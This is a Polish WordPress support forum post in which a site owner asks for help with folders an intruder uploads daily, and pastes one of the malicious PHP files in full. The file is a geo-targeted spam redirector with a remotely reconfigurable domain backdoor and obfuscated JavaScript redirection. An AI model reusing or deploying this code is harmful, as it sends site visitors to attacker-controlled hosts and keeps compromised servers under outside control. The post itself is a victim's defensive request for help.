WordPress.org

Polska

Support

Support » Uwagi » Haker wgrywa folder z plikami do katalogu głównego

Haker wgrywa folder z plikami do katalogu głównego

  • Witam
    Usuwam foldery a on codziennie wgrywa. Foldery mają losowe nazwy i pliki chyba też. Są tam pliki .dat, .inc, png i .php
    Wkleję php

    <?php
    
    /*domain
    mail.com
    domain*/
    
    include_once 'Ih0Ak2KYvbdt.inc';
    
    $white_countries = array('SE', 'FI', 'BG');
    
    $sd_param = "ehohog43";
    
    if ((isset($_GET['action'])) && ($_GET['action'] == 'unsubscribe'))
    {
    	echo "unsubscribed";
    	exit(0);
    }
    
    if ((isset($_GET['id'])) && (!empty($_GET['id'])))
        $enc_id = @base64_encode($_GET['id']);
    else
        $enc_id = '';
    
    $red_host = "mail.com";
    
    if ((isset($_GET[$sd_param])) && (!empty($_GET[$sd_param])))
    {
        $self = __FILE__;
        $script = file_get_contents($self);
    
        if (preg_match("/\/\*domain(.*)domain\*\//s", $script, $matches))
    	{
            $old_domain = trim($matches[1]);
            $script = preg_replace("/".preg_quote($old_domain)."/im", $_GET[$sd_param], $script);
            file_put_contents($self, $script);
            exit("OK");
        }
    }
    
    $fake_script = gen_rnd_str(4, 8).".php";
    $subdomain = gen_rnd_str(3, 4);
    $full_url = "http://$subdomain.$red_host/$fake_script?id=$enc_id";
    
    $ip = get_ip();
    $country = get_country($ip);
    
    if (in_array($country, $white_countries) === false)
    	$full_url = "http://google.com/";
    
    function gen_rnd_str($min, $max)
    {
        $only_alphabet = 'abcdefghijklmnopqrstuvwxyz';
        $characters = '0123456789abcdefghijklmnopqrstuvwxyz';
        $randstring = '';
        $len = rand($min, $max);
        $randstring = $only_alphabet[rand(0, strlen($only_alphabet) - 1)];
        for ($i = 1; $i < $len; $i++) $randstring .= $characters[rand(0, strlen($characters) - 1)];
        return $randstring;
    }
    
    function get_ip()
    {
    	if (isset($_SERVER["HTTP_X_REAL_IP"]))
    		$ip = $_SERVER["HTTP_X_REAL_IP"];
    	elseif (isset($_SERVER["HTTP_X_FORWARDED_FOR"]))
    		$ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
    	else
    		$ip = $_SERVER['REMOTE_ADDR'];
    
    	return $ip;
    }
    
    function get_country($ip)
    {
    	$gi = geoip_open("GkUWjDl0hbp.dat", GEOIP_STANDARD);
    
    	if ($gi)
    	{
    		$country = geoip_country_code_by_addr($gi, $ip);
    		geoip_close($gi);
    
    		if (!$country)
    			$country = "NA";
    
    		return $country;
    	}
    
    	return false;
    }
    
    ?>
    <DOCTYPE html PUBLIC "-//W3C//DTDXHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
        <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
        <noscript>
            <meta http-equiv="refresh" content="0; url=<?php echo $full_url; ?>"/>
        </noscript>
        <title><?php echo gen_rnd_str(4, 8); ?></title>
    </head>
    <body>
    <script language="JavaScript" type="text/javascript">
    var _0x9129=["<?php echo $full_url; ?>","\x72\x65\x70\x6C\x61\x63\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];window[_0x9129[2]][_0x9129[1]](_0x9129[0]);
    </script>
    </body>
    </html>

Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
  • You must be logged in to reply to this topic.
Przejdź do paska narzędzi